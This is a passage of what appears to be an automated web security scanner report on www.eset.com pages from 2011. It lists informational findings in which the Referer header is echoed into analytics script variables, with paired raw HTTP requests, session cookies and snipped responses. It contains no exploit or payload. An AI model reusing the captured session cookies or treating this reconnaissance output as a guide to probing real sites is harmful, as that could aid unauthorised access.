s.prop12="http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
<script type="text/javascript">
   mboxDefine('','home_ticker_clicked');
       function ticker_Log(URL)
       {
           var mboxDestination = ("Destination="+URL);
           mboxUpdate('home_ticker_clicked',mboxDestination);
       }
</script>

Request 2

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:17:20 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:17:21 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:17:21 GMT
X-Varnish: 555654547
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
<script type="text/javascript">
   mboxDefine('','home_ticker_clicked');
       function ticker_Log(URL)
       {
           var mboxDestination = ("Destination="+URL);
           mboxUpdate('home_ticker_clicked',mboxDestination);
       }
</script>

20.4. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/business/products

Request 1

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/server-security/linux-file
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21118
Date: Mon, 25 Apr 2011 12:58:53 GMT
X-Varnish: 1310977832
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/server-security/linux-file";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:59:04 GMT
X-Varnish: 1310978379
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.5. http://www.eset.com/us/business/server-security/linux-file  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/business/server-security/linux-file

Request 1

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17290
Date: Mon, 25 Apr 2011 12:58:48 GMT
X-Varnish: 1310977676
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17208
Date: Mon, 25 Apr 2011 12:58:58 GMT
X-Varnish: 1310978090
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.6. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/home/smart-security

Request 1

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25484
Date: Mon, 25 Apr 2011 15:17:24 GMT
X-Varnish: 555654660
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25467
Date: Mon, 25 Apr 2011 15:17:36 GMT
X-Varnish: 555655337
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.7. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/store

Request 1

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/products";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
